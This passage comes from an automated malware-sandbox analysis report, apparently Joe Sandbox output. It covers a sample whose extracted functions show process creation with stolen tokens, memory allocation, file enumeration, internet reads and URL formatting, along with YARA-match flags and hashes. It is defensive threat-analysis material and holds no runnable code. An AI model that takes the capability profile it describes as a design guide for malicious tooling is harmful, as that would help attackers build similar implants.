                                                                  • Opcode Fuzzy Hash: 2ed4f708f2ae633ca0e893511461a1621bf721b5dd3249825a990886b3c25dec
                                                                  • Instruction Fuzzy Hash: 63D04C24A55900C3FA19BB16FD953A93324ABD6B69F114012D90F42373DF6C84D5C753
                                                                  APIs
                                                                  • InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileInternetRead
                                                                  • String ID:
                                                                  • API String ID: 778332206-0
                                                                  • Opcode ID: f5e95f1cec49cb8295e8910afdc9cd69a30e00266090bda7aefa62782977679d
                                                                  • Instruction ID: 3180c2470e8bd3ded293f072d1eb4c53dd061eb4762ffc4787bcce6c50f8afca
                                                                  • Opcode Fuzzy Hash: f5e95f1cec49cb8295e8910afdc9cd69a30e00266090bda7aefa62782977679d
                                                                  • Instruction Fuzzy Hash: B7F05C2134C6461FE71595EDAC61BF606CED799320F28115BE41CC7392E954CC83C765
                                                                  APIs
                                                                    • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                                                                    • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                                                                    • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                                                                    • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                                                                  • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$CountCreateThreadTickmalloc
                                                                  • String ID:
                                                                  • API String ID: 345437100-0
                                                                  • Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                                                                  • Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
                                                                  • Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                                                                  • Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                                                  • Instruction ID: 910d0dca86248ee6b61208585bf847d44137a7cfffe4cf3b4d725d9636107594
                                                                  • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                                                  • Instruction Fuzzy Hash: 4F418670618B489FD784EB2CD498B2AB7E1FB9C355F44096EF889C7260D734E881CB42
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htonl$ErrorLastOpenProcess
                                                                  • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                                                  • API String ID: 3543785021-1833344708
                                                                  • Opcode ID: c8c97dfc55eba45ef1c6c6993464718e573ee33c36903e71c3618c37d8cddb68
                                                                  • Instruction ID: e0f8f59152eabed40ff82067fb98a79ae2766deee115dd8553f4c4d35461fca8
                                                                  • Opcode Fuzzy Hash: c8c97dfc55eba45ef1c6c6993464718e573ee33c36903e71c3618c37d8cddb68
                                                                  • Instruction Fuzzy Hash: B6624721B1964082DF18DB6AAC553B962D5F7CBB80FA44525ED0E43B5AEF3CC9428BC0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                  • String ID: U
                                                                  • API String ID: 3902385426-4171548499
                                                                  • Opcode ID: 887be5ca941d1e1bbf8005ee108c45f4cc0021591f9d338be499f64fbdbfcab3
                                                                  • Instruction ID: c1613d58f900eca73b4ef37bd1d1c812bcf31d3e55e96d4359860f8606f80d17
                                                                  • Opcode Fuzzy Hash: 887be5ca941d1e1bbf8005ee108c45f4cc0021591f9d338be499f64fbdbfcab3
                                                                  • Instruction Fuzzy Hash: 0102153331468586DB20CF28E6843EEB765F789BA8F500516EB8E47B69DB3DC945CB10
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009AED9D
                                                                    • Part of subcall function 009AE220: _getptd.LIBCMT ref: 009AE236
                                                                    • Part of subcall function 009AE220: __updatetlocinfo.LIBCMT ref: 009AE26B
                                                                    • Part of subcall function 009AE220: __updatetmbcinfo.LIBCMT ref: 009AE292
                                                                  • _errno.LIBCMT ref: 009AEDA2
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _fileno.LIBCMT ref: 009AEDCF
                                                                    • Part of subcall function 009B17F4: _errno.LIBCMT ref: 009B17FD
                                                                    • Part of subcall function 009B17F4: _invalid_parameter_noinfo.LIBCMT ref: 009B1808
                                                                  • write_multi_char.LIBCMT ref: 009AF40B
                                                                  • write_string.LIBCMT ref: 009AF428
                                                                  • write_multi_char.LIBCMT ref: 009AF445
                                                                  • write_string.LIBCMT ref: 009AF4A4
                                                                  • write_string.LIBCMT ref: 009AF4DB
                                                                  • write_multi_char.LIBCMT ref: 009AF4FD
                                                                  • free.LIBCMT ref: 009AF511
                                                                  • _isleadbyte_l.LIBCMT ref: 009AF5E2
                                                                  • write_char.LIBCMT ref: 009AF5F8
                                                                  • write_char.LIBCMT ref: 009AF619
                                                                  • _errno.LIBCMT ref: 009AF71C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009AF727
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID: $@
                                                                  • API String ID: 3318157856-1077428164
                                                                  • Opcode ID: f8df11205d73aff79168b207964888485222e3fd07834b4b3d544df7ad576b6c
                                                                  • Instruction ID: 94a0a0093c9a9047545fdcb02aa2adcc2946b9229083004a78f620b503627b17
                                                                  • Opcode Fuzzy Hash: f8df11205d73aff79168b207964888485222e3fd07834b4b3d544df7ad576b6c
                                                                  • Instruction Fuzzy Hash: 6242483360869486EB24CF99D5643BE7BA8FB43794F241126EE4647A68DB3CC941CBC0
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009AE329
                                                                    • Part of subcall function 009AE220: _getptd.LIBCMT ref: 009AE236
                                                                    • Part of subcall function 009AE220: __updatetlocinfo.LIBCMT ref: 009AE26B
                                                                    • Part of subcall function 009AE220: __updatetmbcinfo.LIBCMT ref: 009AE292
                                                                  • _errno.LIBCMT ref: 009AE32E
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _fileno.LIBCMT ref: 009AE35B
                                                                    • Part of subcall function 009B17F4: _errno.LIBCMT ref: 009B17FD
                                                                    • Part of subcall function 009B17F4: _invalid_parameter_noinfo.LIBCMT ref: 009B1808
                                                                  • write_multi_char.LIBCMT ref: 009AE98B
                                                                  • write_string.LIBCMT ref: 009AE9A8
                                                                  • write_multi_char.LIBCMT ref: 009AE9C5
                                                                  • write_string.LIBCMT ref: 009AEA24
                                                                  • write_string.LIBCMT ref: 009AEA5B
                                                                  • write_multi_char.LIBCMT ref: 009AEA7D
                                                                  • free.LIBCMT ref: 009AEA91
                                                                  • _isleadbyte_l.LIBCMT ref: 009AEB62
                                                                  • write_char.LIBCMT ref: 009AEB78
                                                                  • write_char.LIBCMT ref: 009AEB99
                                                                  • _errno.LIBCMT ref: 009AEC93
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009AEC9E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID:
                                                                  • API String ID: 3318157856-3916222277
                                                                  • Opcode ID: d2d0f6ff9d7b7a13e2b96cc577a047d14fe130a0d0a9348c75ce4f8fc2679a4f
                                                                  • Instruction ID: 4e41af36b0e4ac7dbad4b4bceefa8274fbe6c990517b2962014cbbbca6335b4d
                                                                  • Opcode Fuzzy Hash: d2d0f6ff9d7b7a13e2b96cc577a047d14fe130a0d0a9348c75ce4f8fc2679a4f
                                                                  • Instruction Fuzzy Hash: B332147260879486EF25CF19D5483BE7BB9F783B94F141416EE4A47AA8DB7CC940CB80
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0355E1E4
                                                                    • Part of subcall function 0355D667: _getptd.LIBCMT ref: 0355D67D
                                                                    • Part of subcall function 0355D667: __updatetlocinfo.LIBCMT ref: 0355D6B2
                                                                    • Part of subcall function 0355D667: __updatetmbcinfo.LIBCMT ref: 0355D6D9
                                                                  • _errno.LIBCMT ref: 0355E1E9
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _fileno.LIBCMT ref: 0355E216
                                                                    • Part of subcall function 03560C3B: _errno.LIBCMT ref: 03560C44
                                                                    • Part of subcall function 03560C3B: _invalid_parameter_noinfo.LIBCMT ref: 03560C4F
                                                                  • write_multi_char.LIBCMT ref: 0355E852
                                                                  • write_string.LIBCMT ref: 0355E86F
                                                                  • write_multi_char.LIBCMT ref: 0355E88C
                                                                  • write_string.LIBCMT ref: 0355E8EB
                                                                  • write_multi_char.LIBCMT ref: 0355E944
                                                                  • free.LIBCMT ref: 0355E958
                                                                  • _isleadbyte_l.LIBCMT ref: 0355EA29
                                                                  • write_char.LIBCMT ref: 0355EA3F
                                                                  • write_char.LIBCMT ref: 0355EA60
                                                                  • _errno.LIBCMT ref: 0355EB63
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355EB6E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID: $@
                                                                  • API String ID: 2950348734-1077428164
                                                                  • Opcode ID: 07341e3732a2750f25fb6a453c6349766dbff6c117d6dfe3209b03da8e3e77c7
                                                                  • Instruction ID: 4c1ec9f2ee031a568fc25aed4152c2b794d65ece9174f9dc623e40e23dfbcf3a
                                                                  • Opcode Fuzzy Hash: 07341e3732a2750f25fb6a453c6349766dbff6c117d6dfe3209b03da8e3e77c7
                                                                  • Instruction Fuzzy Hash: CA52F930918B498ADB2DCB58E4662F9B7E5FB96310F18062FFCC7C7161D734B6028682
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0355D770
                                                                    • Part of subcall function 0355D667: _getptd.LIBCMT ref: 0355D67D
                                                                    • Part of subcall function 0355D667: __updatetlocinfo.LIBCMT ref: 0355D6B2
                                                                    • Part of subcall function 0355D667: __updatetmbcinfo.LIBCMT ref: 0355D6D9
                                                                  • _errno.LIBCMT ref: 0355D775
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _fileno.LIBCMT ref: 0355D7A2
                                                                    • Part of subcall function 03560C3B: _errno.LIBCMT ref: 03560C44
                                                                    • Part of subcall function 03560C3B: _invalid_parameter_noinfo.LIBCMT ref: 03560C4F
                                                                  • write_multi_char.LIBCMT ref: 0355DDD2
                                                                  • write_string.LIBCMT ref: 0355DDEF
                                                                  • write_multi_char.LIBCMT ref: 0355DE0C
                                                                  • write_string.LIBCMT ref: 0355DE6B
                                                                  • write_multi_char.LIBCMT ref: 0355DEC4
                                                                  • free.LIBCMT ref: 0355DED8
                                                                  • _isleadbyte_l.LIBCMT ref: 0355DFA9
                                                                  • write_char.LIBCMT ref: 0355DFBF
                                                                  • write_char.LIBCMT ref: 0355DFE0
                                                                  • _errno.LIBCMT ref: 0355E0DA
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355E0E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID:
                                                                  • API String ID: 2950348734-3916222277
                                                                  • Opcode ID: 44556820cebba1103ceb5094a228a3c63f1b381211d8945892cc43e8bddeb570
                                                                  • Instruction ID: e63c9b5365ebda20b479dd6505f216d68faaf03fbb5b46570da9b76ef3619083
                                                                  • Opcode Fuzzy Hash: 44556820cebba1103ceb5094a228a3c63f1b381211d8945892cc43e8bddeb570
                                                                  • Instruction Fuzzy Hash: 5952F732918B498BD72CDB5CE4652BAB7F5FB95310F18462FEC87C7271D635B8028642
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 009A63D6
                                                                  • _snprintf.LIBCMT ref: 009A63F3
                                                                  • _snprintf.LIBCMT ref: 009A6315
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • _snprintf.LIBCMT ref: 009A6648
                                                                  • _snprintf.LIBCMT ref: 009A69A4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                  • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                                                                  • API String ID: 3442832105-1222817042
                                                                  • Opcode ID: 636a98fa85514209f70005b04ca8ead89b4190e8157d1dcb912aa2d8a0183636
                                                                  • Instruction ID: facee8a715216637f8d56909faf2ff4f67f24f2fa9d633588f81edd1b8e74017
                                                                  • Opcode Fuzzy Hash: 636a98fa85514209f70005b04ca8ead89b4190e8157d1dcb912aa2d8a0183636
                                                                  • Instruction Fuzzy Hash: 0D32BC62614E8592EB159F2DE0013E9B3B0FFDA799F045501EF8917B25EF38D2A6C780
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A0F07
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                    • Part of subcall function 0099CFCC: malloc.LIBCMT ref: 0099CFDF
                                                                    • Part of subcall function 0099CFFC: htonl.WS2_32 ref: 0099D007
                                                                  • GetCurrentDirectoryA.KERNEL32 ref: 009A0F7F
                                                                  • FindFirstFileA.KERNEL32 ref: 009A0FB8
                                                                  • GetLastError.KERNEL32 ref: 009A0FC7
                                                                  • free.LIBCMT ref: 009A1002
                                                                  • free.LIBCMT ref: 009A100F
                                                                    • Part of subcall function 009AB1E8: HeapFree.KERNEL32 ref: 009AB1FE
                                                                    • Part of subcall function 009AB1E8: _errno.LIBCMT ref: 009AB208
                                                                    • Part of subcall function 009AB1E8: GetLastError.KERNEL32 ref: 009AB210
                                                                  • FileTimeToSystemTime.KERNEL32 ref: 009A101C
                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 009A102D
                                                                  • FindNextFileA.KERNEL32 ref: 009A10EA
                                                                  • FindClose.KERNEL32 ref: 009A10FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                                                                  • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                                                  • API String ID: 723279517-1754256099
                                                                  • Opcode ID: 6ee2af1134a4c9c9c702069b3ed1fb112293960f288e153385e9598e844af32e
                                                                  • Instruction ID: cf4c7814f8bdc95587fb10a2d6d4fe89b829ca06e4dabf30b505146e1bd2a191
                                                                  • Opcode Fuzzy Hash: 6ee2af1134a4c9c9c702069b3ed1fb112293960f288e153385e9598e844af32e
                                                                  • Instruction Fuzzy Hash: E451AB7230879486DB10DF66E8803AEB7A5F7C6B94F504016EE4A43B99EF7CC606CB40
                                                                  APIs
                                                                  • CreateProcessAsUserA.ADVAPI32 ref: 009A0243
                                                                  • GetLastError.KERNEL32 ref: 009A0251
                                                                  • GetLastError.KERNEL32 ref: 009A0275
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA21
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA49
                                                                  • CreateProcessA.KERNEL32 ref: 009A02C7
                                                                  • GetLastError.KERNEL32 ref: 009A02D1
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 009A0625
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 009A063F
                                                                  • CreateProcessWithTokenW.ADVAPI32 ref: 009A0683
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                                                                  • String ID:
                                                                  • API String ID: 3044875250-0
                                                                  • Opcode ID: b4dadb2b0a0afafdc6fb41f1df9c6971b84a1ac73c104075e8593cd40dbcaad4
                                                                  • Instruction ID: 6e53dc58f6fd4c8fafcdafd9214e88f38d9d6f8359a0955e11516f6e09dae816
                                                                  • Opcode Fuzzy Hash: b4dadb2b0a0afafdc6fb41f1df9c6971b84a1ac73c104075e8593cd40dbcaad4
                                                                  • Instruction Fuzzy Hash: EC61AF32608B44C2EB20DF65E84436E73A9F7C9F98F104526EA4987759DF7CC895CB80
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A77CB
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • _snprintf.LIBCMT ref: 009A77E3
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • FindFirstFileA.KERNEL32 ref: 009A77EE
                                                                  • free.LIBCMT ref: 009A77FA
                                                                    • Part of subcall function 009AB1E8: HeapFree.KERNEL32 ref: 009AB1FE
                                                                    • Part of subcall function 009AB1E8: _errno.LIBCMT ref: 009AB208
                                                                    • Part of subcall function 009AB1E8: GetLastError.KERNEL32 ref: 009AB210
                                                                  • malloc.LIBCMT ref: 009A784A
                                                                  • _snprintf.LIBCMT ref: 009A7862
                                                                  • free.LIBCMT ref: 009A788A
                                                                  • FindNextFileA.KERNEL32 ref: 009A78A3
                                                                  • FindClose.KERNEL32 ref: 009A78B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                                                                  • String ID: %s\*
                                                                  • API String ID: 2620626937-766152087
                                                                  • Opcode ID: 23b6a88991eaeecb41de4e49958cb864f07ba82b9ceb48e7eb1550cb5c125ff7
                                                                  • Instruction ID: 947921e07bb5467ebd1a843e2f383b73829f4cbe01c4e89a8ff1dcdcbb921f7f
                                                                  • Opcode Fuzzy Hash: 23b6a88991eaeecb41de4e49958cb864f07ba82b9ceb48e7eb1550cb5c125ff7
                                                                  • Instruction Fuzzy Hash: 1B3101212082C049EA489BA73D193B9BF29B787FE0F884111DEA90BB56CF3CC402C344
                                                                  APIs
                                                                  • RtlCaptureContext.KERNEL32 ref: 00401A84
                                                                  • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                                                                  • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                                                                  • GetCurrentProcess.KERNEL32 ref: 00401B34
                                                                  • TerminateProcess.KERNEL32 ref: 00401B42
                                                                  • abort.MSVCRT ref: 00401B48
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
